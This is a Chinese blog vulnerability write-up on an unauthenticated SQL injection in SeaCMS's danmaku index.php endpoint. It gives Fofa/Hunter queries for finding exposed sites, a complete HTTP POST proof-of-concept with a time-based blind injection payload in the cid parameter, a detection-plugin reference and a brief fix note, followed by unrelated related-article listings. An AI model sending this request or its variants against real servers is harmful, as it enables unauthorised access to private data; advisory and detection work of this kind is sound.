SeaCMS海洋影视管理系统 index.php SQL注入

于 2024-08-24 23:29:36 发布
阅读量233 收藏
点赞数 3
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xc_214/article/details/141507022
版权

0x01 漏洞描述:

海洋CMS是一套专为不同需求的站长而设计的内容管理系统,灵活、方便、人性化设计、简单易用是最大的特色,可快速建立一个海量内容的专业网站。海洋CMS基于PHP+MySql技术开发,完全开源免费 、无任何加密代码。在index.php中存在SQL注入,导致未授权攻击者可利用该漏洞获取隐私数据。

0x02 搜索语句:

Fofa:app="海洋CMS"

Hunter:body="http://www.seacms.net"

0x03 漏洞复现:

POST /js/player/dmplayer/dmku/index.php?ac=edit HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Ldwk: bG91ZG9uZ3dlbmt1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 56

cid=(select(1)from(select(sleep(5)))x)&text=1&color=1

0x04 yakit检测:

该漏洞已支持yakit插件检测,根据uuid 1ab73e21-fc16-4801-9588-3bbae2ad1418 进行下载

0x05 修复建议:

在Web应用防火墙中添加接口临时黑名单规则

iSee857
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
用友OA漏洞学习——test.jsp SQL注入漏洞
记录并分享学习安全的知识点..
05-02 3545
警告 请勿使用本文提到的内容违反法律。 本文不提供任何担保 目录 警告 一、概述 二、影响版本 三、漏洞复现 验证poc如下: 一、概述 用友 U8 OA test.jsp文件存在 SQL注入漏洞,由于与致远OA使用相同的文件,于是存在了同样的漏洞。 二、影响版本 用友 U8 OA产品,版本不详。 三、漏洞复现 验证poc如下: /yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%2...
ThinkPHP3.2.X SQL注入漏洞的解决方案
amaoatao的博客
03-09 3529
程序部分 1.入口文件加入SQL关键字过滤(立刻要做), API的有多维数据的需要注意 2.任何密码要有等级检测, 密码位数提高到8位以上 3.纯数字的支付密码也要有安全检测, 如’123456’的密码将不能通过 4.登录/支付密码连续错误5次账号暂停24小时(后台参数可设置) 5.密码要先在本地加密(SHA1) 6.涉及API接口对接的项目全部使用AES加密(每个项目最好使用不同的密...
若依(Ruoyi)管理系统后台sql注入+任意文件下载漏洞
Adminxe的博客
08-03 7370
0x00若依介绍 若依可以用于所有的Web应用程序,如网站管理后台,网站会员中心,CMS,CRM,OA。所有前端后台代码封装过后十分精简易上手,出错概率低。同时支持移动客户端访问。系统会陆续更新一些实用功能。 寓意:你若不离不弃,我必生死相依 0x01漏洞描述 若依管理系统是基于SpringBoot的权限管理系统,后台存在sql注入、任意文件下载漏洞,可以读取数据库、服务器上的任意文件内容。 0x02FOFA app=”若依-管理系统” 0x03漏洞复现 SQL注入 这是个..
织梦Dedecms buy_action.php SQL注入漏洞分析
深秋哋黎明的专栏
11-20 5649
Dedecms buy_action.php SQL注入漏洞分析 0x01 补丁对比 通过对比源码和2月25日补丁发现被改动的文件有三个,buy_action.php、uploadsafe.inc.php和sys_info.htm。 sys_info.htm只是添加了一个重置cfg_cookie_encode的代码,而且是静态文件,可以忽略掉。uploadsafe.inc.php
PHP防止SQL注入的方法
tongluren381的博客
10-20 3790
1.前端输入口限制特殊字符输入2.后端做变量转化,过滤和变量参数话​​​​​​​前端input部分 后端php部分一: 后端php部分二: php7 mysql防注入_php如何防sql注入?_雾里听风的博客-CSDN博客SQL注入(SQLi)是一种注入攻击,,可以执行恶意SQL语句。它通过将任意SQL代码插入数据库查询,使攻击者能够完全控制Web应用程序后面的数据库服务器。攻击者可以使用SQL注入漏洞绕过应用程序安全措施;可以绕过网页或Web应用程序的身份验证和授权,并检索整个SQL数据库的内
SQL注入攻击介绍
热门推荐
99度灰的博客
03-30 2万+
SQL注入攻击介绍 一、SQL注入攻击简介 SQL注入攻击是指,后台数据库操作时,如果拼接外部参数到SQL语句中,就可能导致欺骗服务器执行恶意的SQL语句,造成数据泄露、删库、页面篡改等严重后果。按变量类型分为:数字型、字符型;按HTTP提交方式分为:GET注入、POST注入、Cookie注入;按注入方式分为:报错注入、盲注(布尔盲注、时间盲注)、堆叠注入等等。 二、SQL注入分类 按变量类型分类:如SQL语句为select *from user where param=1(数字型)、select *fr
ThinkPHP 5.1.x SQL注入漏洞分析
Fly_鹏程万里
12-13 5162
一、背景介绍 ThinkPHP 是一个快速、简单的基于 MVC 和面向对象的轻量级 PHP 开发框架,遵循 Apache2 开源协议发布。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重开发体验和易用性,为 WEB 应用和 API 开发提供了强有力的支持。 在近期,ThinkPHP 框架被曝出存在SQL注入漏洞。由于SQL注入漏洞的危害性以及该框...
ThinkPHP5.0.x框架SQL注入
An丶的博客
06-05 1万+
漏洞简述尽管ThinkPHP 5.0.x框架采用了参数化查询方式,来操作数据库,但是在 insert 和 update 方法中,传入的参数可控,且无严格过滤,最终导致本次SQL注入漏洞发生。ThinkPHP基础知识在进行漏洞分析之前,我们需要了解一下ThinkPHP基础知识,这里仅介绍对本次漏洞分析有帮助的部分。ThinkPHP5.0的 目录结构thinkphp 应用部署目录├─applicati...
PHP SQL防注入
谁还不是一块小饼干的博客
01-04 4397
参考资料: PHP中防止SQL注入的方法 php操作mysql防止sql注入(合集) PDO防注入原理分析以及使用PDO的注意事项 php SQL 防注入的一些经验 如何在PHP中防止SQL注入PHP安全编程:防止SQL注入 addslashes与mysql_real_escape_string的区别 How can I prevent SQL injection in PHP? 什么是SQL...
vb学生管理系统防止SQL注入两种方法
李勇杰
05-14 3697
防止sql注入 相信大家都学过数据库了,对SQL语句也有了一定的了解,SQL语句里面有很多的“’”号,如果咱们在一些需要调用数据库的文本框中输入"'"时会导致数据库出错。 下面是我对学生系统登录界面用户名文本框的代码修改,仅供大家参考!
基于PHPseacms海洋影视管理系统 php版.zip
07-22
【标题】"基于PHPseacms海洋影视管理系统 php版.zip"是一个用于构建在线影视网站的开源管理系统,它采用PHP编程语言开发,旨在为用户提供高效、便捷的内容管理和发布平台。这款系统专为海洋主题的影视内容设计,...
php_seacms海洋影视管理系统 V5.8.zip.zip
09-25
php_seacms海洋影视管理系统 V5.8.zip.zip】是一个基于PHP编程语言开发的用于构建在线影视网站的管理系统。这个系统专为管理和展示丰富的影视资源而设计,它集成了影片上传、分类管理、播放控制、用户评论等功能,...
PHP实例开发源码—seacms海洋影视管理系统 php版.zip
11-23
PHP实例开发源码—seacms海洋影视管理系统 php版.zip】是一个包含PHP源代码的压缩包,专门用于构建和管理在线视频内容的系统。SeaCMS,全称为海洋影视内容管理系统,是一款基于PHP编程语言的开源软件,适用于搭建...
PHP实例开发源码——seacms海洋影视管理系统 php版.zip
12-01
PHP实例开发源码——seacms海洋影视管理系统 php版.zip】是一个包含PHP源代码的压缩包,专门用于实现海洋影视管理系统的开发。这个系统基于PHP编程语言,为管理和展示在线影视内容提供了一整套解决方案。PHP是一种...
基于PHPseacms海洋影视管理系统php版源码.zip
08-28
【标题】中的“基于PHPseacms海洋影视管理系统php版源码”表明这是一个使用PHP编程语言开发的视频管理系统,名为SeACMS,专用于海洋影视内容的管理和展示。SeACMS是一个开源的CMS(内容管理系统),允许用户通过...
网络安全(黑客)自学
白帽子凯哥聊黑客
08-20 737
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
网络安全(黑客)——自学2024
2401_84466325的博客
08-21 1556
网络安全是一种综合性的概念,涵盖了保护计算机系统、网络基础设施和数据免受未经授权的访问、攻击、损害或盗窃的一系列措施和技术。经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
从密码学角度看网络安全:加密技术的最新进展
A526847的博客
08-20 650
在数字化时代,网络安全已成为不可忽视的重大问题。随着计算机技术和网络应用的飞速发展,黑客和网络攻击手段日益复杂,对个人、企业乃至国家的信息安全构成了严重威胁。密码学作为网络安全领域的核心支柱,其发展对于保护信息安全具有至关重要的作用。本文将探讨加密技术的最新进展,以及这些进展如何助力网络安全
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
最新发布
2401_84466224的博客
08-23 1189
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值